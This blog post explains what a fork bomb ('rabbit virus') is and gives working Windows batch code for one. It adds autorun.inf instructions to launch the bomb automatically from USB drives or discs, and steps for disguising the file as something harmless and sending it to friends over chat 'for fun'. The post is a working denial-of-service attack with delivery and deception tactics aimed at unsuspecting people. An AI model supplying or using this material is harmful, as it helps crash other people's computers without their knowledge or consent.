How to generate Rabbit Virus or Fork bomb?

12:25 AM

#How to generate Rabbit Virus or Fork bomb?

# What is Fork BOMB?

A Fork Bomb or Rabbit Virus is a program which can generate a large no of processes very quickly in order to overload the space available in the list of processes kept by Computer’s Operating System.



It works by spreading cmd.exe in Windows. It just generates cmd.exe again and again so quickly that even your alt+ctrl+del (Task Manager) will not work. Actually Task manager gets overlapped by executing of cmd.exe. It doesn’t allow the Operating System to generate Task Manager at that time.

# How to Create a Fork Bomb

Open notepad.
Type the Following code :

:s
START %0
GOTO :s
  • Save as ForkBomb.bat
  • Your ForkBomb is Ready.
  • You can Save it as ForkBomb.txt to view the Code as if you open that .bat file then fork bomb will start forking.
  • Don’t click on the ForkBomb.bat file now if you want to see what happens next then your wish but I am not responsible for it.

Using Fork Bomb :


Making An Autorun ForkBomb:
       
Suppose you have created a fork bomb.It will be surely a .bat file as i have told you.Now place this .bat file in your pendrive/usb or in a cd/dvd with a autorun file(calling that .bat file).It means whenever the cd/dvd/pendrive/usb will open it will automatic call that .bat file(If the autorun feature is enabled).
       Now the question arise that how I am gonna create a autorun file which will call that .bat file which contains the form bomb programming. 

        
Steps to create the AUTORUN fIle:
  • Open notepad.
  • Type [autorun] at the first line.
  • Type open = forkbomb.bat; (Instead of fork bomb it can be anything)

  • Save it as autorun.inf
  • Your autorun file is created which will call that .bat file.
The autorun file will look like this :



Now place it in Your Pendrive/usb/cd/dvd. Remember this will work whenever the autorun feature is enabled on that drive.Otherwise first make it enable and then run this.

Sending the Forkbomb to friends Via Network:(For Fun Only)
  •  Put your forkbomb in a folder.
  • Go to that folder and right click on your forkbomb file.
  • Select "Create Shortcut".
  • Now there should be a shortcut right next to that. Right click that shortcut and go into the properties.
  • Go to the shortcut tab and click "Change Icon." There can be an error message, just ignore it.
  • Change it to whatever you want the file to be.
  • Rename the shortcut so that there is no "Shortcut to" at the beginning of the file name.
  • Right click your original forkbomb file and go to properties.
  •  Click on the hidden button.
  • Press ok and go up to tools on the folder menu bar.
  • Go to the view tab and look for the thing that says "Do not show hidden files and folders." Select that and press ok.
  • Now send that file to your friend via any messenger service/chat service when he/she clicks on that and boob as the forkbomb virus is started.

Adispark won't be responsible for any harm to your machine. So be alert before using it.

Share It

Related Posts

Previous
Next Post »